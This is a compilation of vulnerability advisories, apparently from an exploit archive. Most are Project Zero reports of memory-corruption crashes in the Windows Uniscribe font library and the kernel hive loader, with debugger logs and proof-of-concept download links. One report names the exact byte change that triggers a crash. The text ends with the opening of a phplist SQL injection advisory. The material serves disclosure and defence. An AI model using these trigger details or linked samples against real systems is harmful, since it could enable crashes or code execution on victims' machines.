Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1027
We have encountered a crash in the Windows Uniscribe user-mode library, in an unnamed function called by USP10!ttoGetTableData, while trying to display text using a corrupted font file:
---
(46ac.5f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0945afce ebx=00000100 ecx=09463000 edx=00000004 esi=0945afba edi=0946006b
eip=75202dae esp=0059f634 ebp=0059f668 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!ttoGetTableData+0xc4e:
75202dae 668939 mov word ptr [ecx],di ds:002b:09463000=????
0:000> kb
ChildEBP RetAddr Args to Child
0059f668 75202bf8 0945af96 09462fb8 0059f688 USP10!ttoGetTableData+0xc4e
0059f690 752021b1 09462fb8 09462fb8 0945ad42 USP10!ttoGetTableData+0xa98
0059f6a4 751f7274 09458fd0 094589d0 0059f734 USP10!ttoGetTableData+0x51
0059f704 751f7044 0000001a 093f3d88 09401fa8 USP10!LoadTTOArabicShapeTables+0x184
0059f718 751fc638 51010f6c 093f3d88 0059f744 USP10!LoadArabicShapeTables+0xd4
0059f728 751fc5c8 51010f6c 094587d0 093e6124 USP10!ArabicSimpleLoadTbl+0x28
0059f744 751ea5a0 51010f6c 751e5348 0000001a USP10!ArabicLoadTbl+0xa8
0059f76c 751ea692 093e6124 51010f6c 0000001a USP10!UpdateCache+0xb0
0059f780 751f152d 51010f6c 093e6000 751f15db USP10!ScriptCheckCache+0x62
0059f78c 751f15db 00000001 00000001 00000000 USP10!GetShapeFunction+0xd
0059f7c4 751f2b14 00000001 00000001 0059f844 USP10!RenderItemNoFallback+0x5b
0059f7f0 751f2da2 00000001 00000001 0059f844 USP10!RenderItemWithFallback+0x104
0059f814 751f4339 00000001 0059f844 093e6124 USP10!RenderItem+0x22
0059f858 751e7a04 000004a0 00000400 51010f6c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0059f870 76ca5465 51010f6c 093e6040 0000000a USP10!ScriptStringAnalyse+0x284
0059f8bc 76ca5172 51010f6c 0059fca4 0000000a LPK!LpkStringAnalyse+0xe5
0059f9b8 76ca1410 51010f6c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0059f9ec 763c18b0 51010f6c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0059fa2c 763c22bf 51010f6c 00000070 00000000 USER32!DT_DrawStr+0x13c
0059fa78 763c21f2 51010f6c 0059fca4 0059fcb8 USER32!DT_GetLineBreak+0x78
0059fb24 763c14d4 51010f6c 00000000 0000000a USER32!DrawTextExWorker+0x255
0059fb48 763c2475 51010f6c 0059fca4 ffffffff USER32!DrawTextExW+0x1e
0059fb7c 00336a5c 51010f6c 0059fca4 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd ecx
09463000 ???????? ???????? ???????? ????????
09463010 ???????? ???????? ???????? ????????
09463020 ???????? ???????? ???????? ????????
09463030 ???????? ???????? ???????? ????????
09463040 ???????? ???????? ???????? ????????
09463050 ???????? ???????? ???????? ????????
09463060 ???????? ???????? ???????? ????????
09463070 ???????? ???????? ???????? ????????
0:000> !heap -p -a ecx
address 09463000 found in
_DPH_HEAP_ROOT @ 93e1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
93e2fa4: 9462fb8 48 - 9462000 2000
5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
774e3431 ntdll!RtlAllocateHeap+0x0000023a
5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
751f6644 USP10!UspAllocCache+0x00000054
751f725b USP10!LoadTTOArabicShapeTables+0x0000016b
751f7044 USP10!LoadArabicShapeTables+0x000000d4
751fc638 USP10!ArabicSimpleLoadTbl+0x00000028
751fc5c8 USP10!ArabicLoadTbl+0x000000a8
751ea5a0 USP10!UpdateCache+0x000000b0
751ea692 USP10!ScriptCheckCache+0x00000062
751f152d USP10!GetShapeFunction+0x0000000d
751f2b14 USP10!RenderItemWithFallback+0x00000104
751f2da2 USP10!RenderItem+0x00000022
751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
751e7a04 USP10!ScriptStringAnalyse+0x00000284
76ca5465 LPK!LpkStringAnalyse+0x000000e5
76ca5172 LPK!LpkCharsetDraw+0x00000332
76ca1410 LPK!LpkDrawTextEx+0x00000040
763c18b0 USER32!DT_DrawStr+0x0000013c
763c22bf USER32!DT_GetLineBreak+0x00000078
763c21f2 USER32!DrawTextExWorker+0x00000255
763c14d4 USER32!DrawTextExW+0x0000001e
763c2475 USER32!DrawTextW+0x0000004d
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 3 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1026&desc=2
We have encountered a crash in the Windows Uniscribe user-mode library, in the memcpy() function called by USP10!MergeLigRecords, while trying to display text using a corrupted font file:
---
(2bd0.637c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0929a000 ebx=09299fa0 ecx=00000009 edx=00000002 esi=09299fda edi=092b7914
eip=76bc9b60 esp=0015f534 ebp=0015f53c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
msvcrt!memcpy+0x5a:
76bc9b60 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr Args to Child
0015f53c 751f777d 092b7914 09299fda 00000026 msvcrt!memcpy+0x5a
0015f554 751f74e9 0928ffd0 0928f9d0 0015f5f0 USP10!MergeLigRecords+0x14d
0015f5b4 751f7044 0000001a 09223d88 09233fa8 USP10!LoadTTOArabicShapeTables+0x3f9
0015f5c8 751fc5f4 a60118b0 09223d88 09216124 USP10!LoadArabicShapeTables+0xd4
0015f5e4 751ea5a0 a60118b0 0928f7d0 0000001a USP10!ArabicLoadTbl+0xd4
0015f608 751ea692 09216124 a60118b0 0000001a USP10!UpdateCache+0xb0
0015f61c 751f152d a60118b0 09216000 751f15db USP10!ScriptCheckCache+0x62
0015f628 751f15db 00000001 00000001 092162e8 USP10!GetShapeFunction+0xd
0015f660 751f2b14 00000001 00000000 0015f6e0 USP10!RenderItemNoFallback+0x5b
0015f68c 751f2da2 00000001 00000000 0015f6e0 USP10!RenderItemWithFallback+0x104
0015f6b0 751f4339 00000000 0015f6e0 09216124 USP10!RenderItem+0x22
0015f6f4 751e7a04 000004a0 00000400 a60118b0 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0015f70c 76ca5465 a60118b0 09216040 0000000a USP10!ScriptStringAnalyse+0x284
0015f758 76ca5172 a60118b0 0015fb40 0000000a LPK!LpkStringAnalyse+0xe5
0015f854 76ca1410 a60118b0 00000000 00000000 LPK!LpkCharsetDraw+0x332
0015f888 763c18b0 a60118b0 00000000 00000000 LPK!LpkDrawTextEx+0x40
0015f8c8 763c22bf a60118b0 000000c0 00000000 USER32!DT_DrawStr+0x13c
0015f914 763c21f2 a60118b0 0015fb40 0015fb54 USER32!DT_GetLineBreak+0x78
0015f9c0 763c14d4 a60118b0 00000000 0000000a USER32!DrawTextExWorker+0x255
0015f9e4 763c2475 a60118b0 0015fb40 ffffffff USER32!DrawTextExW+0x1e
0015fa18 010e6a5c a60118b0 0015fb40 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
09299fda 03e003df 03df03ea 03df0382 03df0384
09299fea 03df0388 03e0038e 03e00382 03e00384
09299ffa 03e00388 ???????? ???????? ????????
0929a00a ???????? ???????? ???????? ????????
0929a01a ???????? ???????? ???????? ????????
0929a02a ???????? ???????? ???????? ????????
0929a03a ???????? ???????? ???????? ????????
0929a04a ???????? ???????? ???????? ????????
0:000> dd edi
092b7914 ???????? ???????? ???????? ????????
092b7924 ???????? ???????? ???????? ????????
092b7934 ???????? ???????? ???????? ????????
092b7944 ???????? ???????? ???????? ????????
092b7954 ???????? ???????? ???????? ????????
092b7964 ???????? ???????? ???????? ????????
092b7974 ???????? ???????? ???????? ????????
092b7984 ???????? ???????? ???????? ????????
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept malformed font file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1025
We have encountered a crash in the Windows Uniscribe user-mode library, in the memset() function called by USP10!otlCacheManager::GlyphsSubstituted, while trying to display text using a corrupted font file:
---
(449c.6338): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092ac250 ebx=092ac230 ecx=00000784 edx=00000074 esi=0028ea6c edi=092affd0
eip=76bc9c8d esp=0028e978 ebp=0028e97c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
msvcrt!_VEC_memcpy+0x116:
76bc9c8d 660f7f4730 movdqa xmmword ptr [edi+30h],xmm0 ds:002b:092b0000=????????????????????????????????
0:000> kb
ChildEBP RetAddr Args to Child
0028e97c 76bc9c39 092ac250 0003ff80 00000006 msvcrt!_VEC_memcpy+0x116
0028e99c 76bc9cde 092ac250 00000000 0003fff4 msvcrt!_VEC_memzero+0x36
0028e9c0 75234b58 092ac248 00000000 0003fffc msvcrt!_VEC_memzero+0x82
0028e9e0 752336a1 0028ed18 00000006 0000ffff USP10!otlCacheManager::GlyphsSubstituted+0xc8
0028ebc0 7522f29f 42555347 0028ed58 0028ece4 USP10!ApplyFeatures+0x541
0028ec0c 7522b083 00000000 092c6ffc 092c6e18 USP10!SubstituteOtlGlyphs+0x1bf
0028ec38 75223921 0028ecb4 0028ed0c 0028ed58 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0028eed0 7521548a 0028efdc 0028f008 0028eff0 USP10!ArabicEngineGetGlyphs+0x891
0028ef90 7521253f 0028efdc 0028f008 0028eff0 USP10!ShapingGetGlyphs+0x36a
0028f078 751e5c6f 2a0123f2 092a6124 092a6318 USP10!ShlShape+0x2ef
0028f0bc 751f167a 2a0123f2 092a6124 092a6318 USP10!ScriptShape+0x15f
0028f11c 751f2b14 00000000 00000000 0028f19c USP10!RenderItemNoFallback+0xfa
0028f148 751f2da2 00000000 00000000 0028f19c USP10!RenderItemWithFallback+0x104
0028f16c 751f4339 00000000 0028f19c 092a6124 USP10!RenderItem+0x22
0028f1b0 751e7a04 000004a0 00000400 2a0123f2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0028f1c8 76ca5465 2a0123f2 092a6040 0000000a USP10!ScriptStringAnalyse+0x284
0028f214 76ca5172 2a0123f2 0028f5fc 0000000a LPK!LpkStringAnalyse+0xe5
0028f310 76ca1410 2a0123f2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0028f344 763c18b0 2a0123f2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0028f384 763c22bf 2a0123f2 00000070 00000000 USER32!DT_DrawStr+0x13c
0028f3d0 763c21f2 2a0123f2 0028f5fc 0028f610 USER32!DT_GetLineBreak+0x78
0028f47c 763c14d4 2a0123f2 00000000 0000000a USER32!DrawTextExWorker+0x255
0028f4a0 763c2475 2a0123f2 0028f5fc ffffffff USER32!DrawTextExW+0x1e
0028f4d4 01336a5c 2a0123f2 0028f5fc ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd edi
092affd0 00000000 00000000 00000000 00000000
092affe0 00000000 00000000 00000000 00000000
092afff0 00000000 00000000 00000000 00000000
092b0000 ???????? ???????? ???????? ????????
092b0010 ???????? ???????? ???????? ????????
092b0020 ???????? ???????? ???????? ????????
092b0030 ???????? ???????? ???????? ????????
092b0040 ???????? ???????? ???????? ????????
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 2 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1023
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!AssignGlyphTypes function, while trying to display text using a corrupted font file:
---
(58d0.5ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0042f2cc ebx=00000001 ecx=00000091 edx=00000091 esi=095c0004 edi=000007e1
eip=75235699 esp=0042ef8c ebp=0042ef98 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e movzx ecx,word ptr [esi] ds:002b:095c0004=????
0:000> kb
ChildEBP RetAddr Args to Child
0042ef98 75233660 0042f2cc 095dfc86 0000f81e USP10!AssignGlyphTypes+0x79
0042f17c 7522f29f 42555347 0042f2e4 0042f2a8 USP10!ApplyFeatures+0x500
0042f1c8 7522f710 00000000 095e0000 095dfc78 USP10!SubstituteOtlGlyphs+0x1bf
0042f204 752213c0 0042f280 0042f2b8 0042f2e4 USP10!SubstituteOtlChars+0x220
0042f480 7521548a 0042f58c 0042f5b8 0042f5a0 USP10!HebrewEngineGetGlyphs+0x690
0042f540 7521253f 0042f58c 0042f5b8 0042f5a0 USP10!ShapingGetGlyphs+0x36a
0042f628 751e5c6f 1b01233b 095b6124 095b6318 USP10!ShlShape+0x2ef
0042f66c 751f167a 1b01233b 095b6124 095b6318 USP10!ScriptShape+0x15f
0042f6cc 751f2b14 00000000 00000000 0042f74c USP10!RenderItemNoFallback+0xfa
0042f6f8 751f2da2 00000000 00000000 0042f74c USP10!RenderItemWithFallback+0x104
0042f71c 751f4339 00000000 0042f74c 095b6124 USP10!RenderItem+0x22
0042f760 751e7a04 000004a0 00000400 1b01233b USP10!ScriptStringAnalyzeGlyphs+0x1e9
0042f778 76ca5465 1b01233b 095b6040 0000000a USP10!ScriptStringAnalyse+0x284
0042f7c4 76ca5172 1b01233b 0042fbac 0000000a LPK!LpkStringAnalyse+0xe5
0042f8c0 76ca1410 1b01233b 00000000 00000000 LPK!LpkCharsetDraw+0x332
0042f8f4 763c18b0 1b01233b 00000000 00000000 LPK!LpkDrawTextEx+0x40
0042f934 763c22bf 1b01233b 000000b0 00000000 USER32!DT_DrawStr+0x13c
0042f980 763c21f2 1b01233b 0042fbac 0042fbc0 USER32!DT_GetLineBreak+0x78
0042fa2c 763c14d4 1b01233b 00000000 0000000a USER32!DrawTextExWorker+0x255
0042fa50 763c2475 1b01233b 0042fbac ffffffff USER32!DrawTextExW+0x1e
0042fa84 013b6a5c 1b01233b 0042fbac ffffffff USER32!DrawTextW+0x4d
[...]
0:000> u
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e movzx ecx,word ptr [esi]
7523569c b8f0ff0000 mov eax,0FFF0h
752356a1 66214602 and word ptr [esi+2],ax
752356a5 51 push ecx
752356a6 8d4d0c lea ecx,[ebp+0Ch]
752356a9 e852420000 call USP10!otlClassDef::getClass (75239900)
752356ae 66094602 or word ptr [esi+2],ax
752356b2 eb09 jmp USP10!AssignGlyphTypes+0x9d (752356bd)
0:000> dd esi
095c0004 ???????? ???????? ???????? ????????
095c0014 ???????? ???????? ???????? ????????
095c0024 ???????? ???????? ???????? ????????
095c0034 ???????? ???????? ???????? ????????
095c0044 ???????? ???????? ???????? ????????
095c0054 ???????? ???????? ???????? ????????
095c0064 ???????? ???????? ???????? ????????
095c0074 ???????? ???????? ???????? ????????
---
While the immediate crash is caused by an invalid memory read, the two instructions that follow in the disassembly above — at 0x752356a1 (`and word ptr [esi+2],ax`) and 0x752356ae (`or word ptr [esi+2],ax`) — write back to the same out-of-bounds location (note that these are instruction addresses inside USP10, not data addresses). The bug is therefore a read-modify-write of memory outside the allocation, i.e. a memory corruption primitive with potential for remote code execution, not merely an out-of-bounds read.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 3 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1022
We have encountered a crash in the Windows Uniscribe user-mode library, in the memmove() function called by USP10!otlList::insertAt, while trying to display text using a corrupted font file:
---
(4b44.24a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=093bc154 ebx=0943c104 ecx=00000012 edx=00000000 esi=093bc10c edi=0943c104
eip=76bc9f40 esp=001ee9b4 ebp=001ee9bc iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
msvcrt!memmove+0x5a:
76bc9f40 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr Args to Child
001ee9bc 7522e87a 0943c104 093bc10c 00000048 msvcrt!memmove+0x5a
001ee9dc 752358bd 00000002 ffffffff 00000001 USP10!otlList::insertAt+0x3a
001ee9f8 7523a414 001eee10 001eee34 00000002 USP10!InsertGlyphs+0x1d
001eea3c 75239676 001eee10 001eee34 001eed24 USP10!SubstituteNtoM+0x224
001eea7c 75231393 001eee10 001eee34 001eed24 USP10!otlMultiSubstLookup::apply+0xf6
001eeae0 752335e1 00000000 001eee10 001eee34 USP10!ApplyLookup+0x183
001eece4 7522f29f 42555347 001eee4c 001eee10 USP10!ApplyFeatures+0x481
001eed30 7522f710 00000000 093da000 093d9b58 USP10!SubstituteOtlGlyphs+0x1bf
001eed6c 752213c0 001eede8 001eee20 001eee4c USP10!SubstituteOtlChars+0x220
001eefe8 7521548a 001ef0f4 001ef120 001ef108 USP10!HebrewEngineGetGlyphs+0x690
001ef0a8 7521253f 001ef0f4 001ef120 001ef108 USP10!ShapingGetGlyphs+0x36a
001ef190 751e5c6f 86011dce 093b6124 093b6318 USP10!ShlShape+0x2ef
001ef1d4 751f167a 86011dce 093b6124 093b6318 USP10!ScriptShape+0x15f
001ef234 751f2b14 00000000 00000000 001ef2b4 USP10!RenderItemNoFallback+0xfa
001ef260 751f2da2 00000000 00000000 001ef2b4 USP10!RenderItemWithFallback+0x104
001ef284 751f4339 00000000 001ef2b4 093b6124 USP10!RenderItem+0x22
001ef2c8 751e7a04 000004a0 00000400 86011dce USP10!ScriptStringAnalyzeGlyphs+0x1e9
001ef2e0 76ca5465 86011dce 093b6040 0000000a USP10!ScriptStringAnalyse+0x284
001ef32c 76ca5172 86011dce 001ef714 0000000a LPK!LpkStringAnalyse+0xe5
001ef428 76ca1410 86011dce 00000000 00000000 LPK!LpkCharsetDraw+0x332
001ef45c 763c18b0 86011dce 00000000 00000000 LPK!LpkDrawTextEx+0x40
001ef49c 763c22bf 86011dce 00000058 00000000 USER32!DT_DrawStr+0x13c
001ef4e8 763c21f2 86011dce 001ef714 001ef728 USER32!DT_GetLineBreak+0x78
001ef594 763c14d4 86011dce 00000000 0000000a USER32!DrawTextExWorker+0x255
001ef5b8 763c2475 86011dce 001ef714 ffffffff USER32!DrawTextExW+0x1e
001ef5ec 013abcec 86011dce 001ef714 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
093bc10c 00000b45 00010001 00000b46 00010002
093bc11c 00000b47 00010003 00000b48 00010004
093bc12c 00000b49 00010005 00000b4a 00010006
093bc13c 00000b4b 00010007 00000b4c 00010008
093bc14c 00000b4d 00010009 000b0000 67696c63
093bc15c 00000001 000b0000 00000001 000000f8
093bc16c 00000048 001104bd 00010000 00000b26
093bc17c 00010001 00000b27 00010002 00000b28
0:000> dd edi
0943c104 ???????? ???????? ???????? ????????
0943c114 ???????? ???????? ???????? ????????
0943c124 ???????? ???????? ???????? ????????
0943c134 ???????? ???????? ???????? ????????
0943c144 ???????? ???????? ???????? ????????
0943c154 ???????? ???????? ???????? ????????
0943c164 ???????? ???????? ???????? ????????
0943c174 ???????? ???????? ???????? ????????
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 3 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019
We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file. (The faulting instruction is shown by the debugger as USP10!ScriptPositionSingleGlyph+0x28533, the nearest exported symbol; the `kb` output below resolves the same frame to otlChainRuleSetTable::rule+0x13.)
---
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002 mov cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????
0:000> kb
ChildEBP RetAddr Args to Child
0026ec2c 752382f3 0026ecac 00001b9f 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 75231471 42555347 0026f078 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 752335e1 000000e4 0026f078 0026f09c USP10!ApplyLookup+0x261
0026ef4c 7522f29f 42555347 0026f0b4 0026f078 USP10!ApplyFeatures+0x481
0026ef98 7522f710 00000000 09342ffa 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 752213c0 0026f050 0026f088 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 7521548a 0026f35c 0026f388 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 7521253f 0026f35c 0026f388 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 751e5c6f 2d011da2 09316124 09316318 USP10!ShlShape+0x2ef
0026f440 751f167a 2d011da2 09316124 09316318 USP10!ScriptShape+0x15f
0026f4a0 751f2b14 00000000 00000000 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 751f2da2 00000000 00000000 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 751f4339 00000000 0026f520 09316124 USP10!RenderItem+0x22
0026f534 751e7a04 000004a0 00000400 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 76ca5465 2d011da2 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 76ca5172 2d011da2 0026fa1c 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 76ca1410 2d011da2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 763c18b0 2d011da2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0026f708 763c22bf 2d011da2 00000048 00000000 USER32!DT_DrawStr+0x13c
0026f754 763c21f2 2d011da2 0026fa1c 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 763c14d4 2d011da2 00000000 0000000a USER32!DrawTextExWorker+0x255
0026f824 763c2475 2d011da2 0026fa1c ffffffff USER32!DrawTextExW+0x1e
[...]
---
The crash is caused by a single-byte change in a legitimate font file: at offset 0x845A, byte 0x00 is changed to 0xFF. The data region corresponds to the "GSUB" sfnt table. The change causes the otlChainRuleTable::backtrackGlyphCount() function to return an overly large 16-bit integer of 0xED00, which is then used as the number of iterations in a subsequent loop in the otlChainingLookup::apply() function, without prior validation. Increasing (out-of-bounds) indexes are then passed to otlChainRuleSetTable::rule() in the 2nd parameter, and used to address an array of 16-bit indexes. This is where the crash takes place, as the large index eventually starts pointing into the boundary of the last mapped heap memory page.
The 16-bit value read from outside the allocated buffer is later used as yet another index, addressing an array in the otlChainRuleTable::otlChainRuleTable() routine. While that function only appears to read from the newly formed pointer at first glance, we are not ruling out the possibility of memory corruption. In a read-only scenario, the issue could potentially be used to disclose sensitive data from the process heap.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with the original and modified TTF files.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=993
We have encountered Windows kernel crashes in the internal nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages functions while loading corrupted registry hive files. We believe both crashes are caused by the same bug. Excerpts of the crash logs generated after triggering the bug are shown below:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: a2b23004, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 817f7f04, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
[...]
STACK_TEXT:
a3c0b70c 818b68d0 a06529c8 a0652fd8 a06529c8 nt!HvpGetBinMemAlloc+0x8
a3c0b73c 817f113e 00000001 80000580 80000578 nt!HvFreeHive+0x11c
a3c0b798 817c4fac a3c0b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a3c0b85c 817c5d91 a3c0bbb8 00000000 a3c0b9f4 nt!CmpInitHiveFromFile+0x1be
a3c0b9c0 817cdaba a3c0bbb8 a3c0ba88 a3c0ba0c nt!CmpCmdHiveOpen+0x50
a3c0bacc 817c63c4 a3c0bb90 a3c0bbb8 00000010 nt!CmLoadKey+0x459
a3c0bc0c 8165cdb6 002efa0c 00000000 00000010 nt!NtLoadKeyEx+0x56c
a3c0bc0c 77796c74 002efa0c 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002efa74 00000000 00000000 00000000 00000000 0x77796c74
---
and
---
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000022,
Arg2: a9c14000
Arg3: 00000001
Arg4: 00000000
[...]
STACK_TEXT:
a353b688 81760bf9 a9c14000 a353b6c0 a353b6b4 nt!ExpFindAndRemoveTagBigPages+0x1fd
a353b6f8 8184d349 a9c14000 00000000 a353b73c nt!ExFreePoolWithTag+0x13f
a353b708 818d48d9 a9c14000 00001000 a87bcfd8 nt!CmpFree+0x17
a353b73c 8180f13e 00000001 80000560 80000548 nt!HvFreeHive+0x125
a353b798 817e2fac a353b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a353b85c 817e3d91 a353bbb8 00000000 a353b9f4 nt!CmpInitHiveFromFile+0x1be
a353b9c0 817ebaba a353bbb8 a353ba88 a353ba0c nt!CmpCmdHiveOpen+0x50
a353bacc 817e43c4 a353bb90 a353bbb8 00000010 nt!CmLoadKey+0x459
a353bc0c 8167adb6 002bf614 00000000 00000010 nt!NtLoadKeyEx+0x56c
a353bc0c 77a36c74 002bf614 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002bf67c 00000000 00000000 00000000 00000000 0x77a36c74
---
The issue reproduces on Windows 7 32- and 64-bit, and manifests itself both with and without Special Pool (it is still advised to have the mechanism enabled). In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.
The root cause of the crashes is unknown. It must be noted that in our test environment, reproduction has been very unreliable: the same hive could crash the system in one run, and then parse fine (or fail with an error) in 10 subsequent runs. In order to facilitate reproduction, I'm providing a high number of testcases which were seen to cause a bugcheck once or more, in hope that at least one of them will also reproduce externally.
################################################################################
On November 29, MSRC let us know that they were unable to reproduce a crash with the provided samples and report, and asked for more information and/or kernel crash dumps.
One day later, we've looked into the bug again and discovered that it wasn't sufficient to just load a single corrupted hive to trigger the bugcheck: instead, it is necessary to sequentially load several corrupted hives from the same path in the filesystem. MSRC confirmed that they could reliably reproduce the problem with this new information.
Since the additional detail is crucial to observe the symptoms of the bug and it was not included in the original report, I'm resetting the "Reported" date to November 30.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip
1. Introduction
Affected Product: phplist 3.2.6
Fixed in: 3.3.1
Fixed Version Link: https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website: https://www.phplist.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/10/2017
Disclosed to public: 02/20/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits: Tim Coen of Curesec GmbH
2. Overview
phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to SQL injection.
